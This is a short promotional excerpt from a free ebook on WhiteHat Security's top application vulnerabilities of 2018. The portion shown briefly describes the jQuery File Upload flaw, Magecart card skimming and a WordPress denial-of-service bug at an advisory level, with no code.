10 dangerous app vulnerabilities to watch out for (free PDF)
Even though patches are often available, organizations commonly drag their feet—attracting threat actors to exploit unpatched installations. This ebook looks at WhiteHat Security’s top 10 list of vulnerabilities that surfaced last year.
From the ebook:
Security vulnerabilities are a reality of working in IT, with tech professionals tasked with ensuring that devices on the network are secured against the latest disclosed flaws. With thousands responsibly disclosed each year—to say nothing of vulnerabilities sold on the Dark Web—the task of maintaining the security integrity of devices and applications running on your network can be daunting.
WhiteHat Security recently released its Top 10 Application Security Vulnerabilities of 2018 report, detailing the most common exploits used last year. Most, if not all, of these vulnerabilities are still being exploited in the wild by malicious actors, with some of the vulnerabilities existing as components in software packages you may be unaware you are using.
Here are the top 10 app security vulnerabilities to watch out for in the coming year.
1. jQuery File Upload (CVE-2018-9206)
Though the jQuery File Upload vulnerability was identified only last year, hackers have used it to implant web shells and commandeer vulnerable servers since at least 2016, researchers at Akamai told our sister site ZDNet. The plugin is the second most-starred jQuery project on GitHub, second only to the jQuery framework itself.
2. Magecart credit card skimming
A variety of malicious groups are using Magecart to inject malware into ecommerce sites to steal payment details. Magecart is the key behind the TicketMaster, British Airways, and Newegg breaches, the Shopper Approved ecommerce toolkit, and extensions of ecommerce platform Magento, first reported in 2018, with OXO International disclosing a data breach in January 2019.
3. WordPress Denial of Service (CVE-2018-6989)
The ubiquity of WordPress makes the blogging platform a popular target for malicious actors, with this vulnerability allowing unauthenticated users to abuse the load-scripts.php component to request mass quantities of JavaScript files, quickly overloading servers.